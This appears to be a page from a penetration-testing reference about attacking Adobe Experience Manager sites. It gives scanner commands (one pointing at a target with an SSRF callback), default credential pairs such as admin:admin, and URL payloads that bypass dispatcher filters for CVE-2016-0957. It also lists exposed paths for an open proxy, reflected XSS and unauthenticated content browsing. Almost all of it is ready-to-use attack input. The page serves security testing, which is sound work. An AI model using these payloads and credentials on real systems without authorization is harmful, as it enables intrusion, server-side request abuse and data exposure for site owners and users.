Pentest Book
Search…
Adobe AEM
Tools
1
# https://github.com/0ang3el/aem-hacker
2
python3 aem_discoverer.py --file list.txt
3
python3 aem_hacker.py -u https://target.com --host [SSRF_CALLBACK]
4
#https://github.com/Raz0r/aemscan
Copied!
Paths
1
#https://github.com/clarkvoss/AEM-List/blob/main/paths
2
#https://github.com/emadshanab/Adobe-Experience-Manager/blob/main/aem-paths.txt
Copied!
Creds
1
admin:admin
2
author:author
3
anonymous:anonymous
4
replication-receiver:replication-receiver
5
[email protected]:jdoe
6
[email protected]:aparker
Copied!
​
Vulns
CVE-2016-0957 - Bypass dispatcher filters
1
https://aemsite/bin/querybuilder.json/a.css
2
https://aemsite/bin/querybuilder.json/a.html
3
https://aemsite/bin/querybuilder.json/a.ico
4
https://aemsite/bin/querybuilder.json/a.png
5
https://aemsite/bin/querybuilder.json;%0aa.css
6
https://aemsite/bin/querybuilder.json/a.1.json
7
https://aemsite///bin///querybuilder.json
8
https://aemsite///etc.json
9
​
10
#Depending on the version and configuration of the affected AEM installation, the above vulnerability could expose the Publish tier to a number of vulnerabilities, including:
11
# Provides a proxy which is able to be used to perform arbitrary server-side requests.
12
/libs/opensocial/proxy
13
# Exposes a reflected Cross-Site Scripting (XSS) vulnerability in older versions of AEM 5.X.
14
/etc/mobile/useragent-test.html
15
# Exposes an unauthenticated, browsable view of all content in the repository which may lead to information disclosure.
16
/etc/reports/diskusage.html
Copied!
Last modified 1mo ago
Export as PDF
Copy link
Edit on GitHub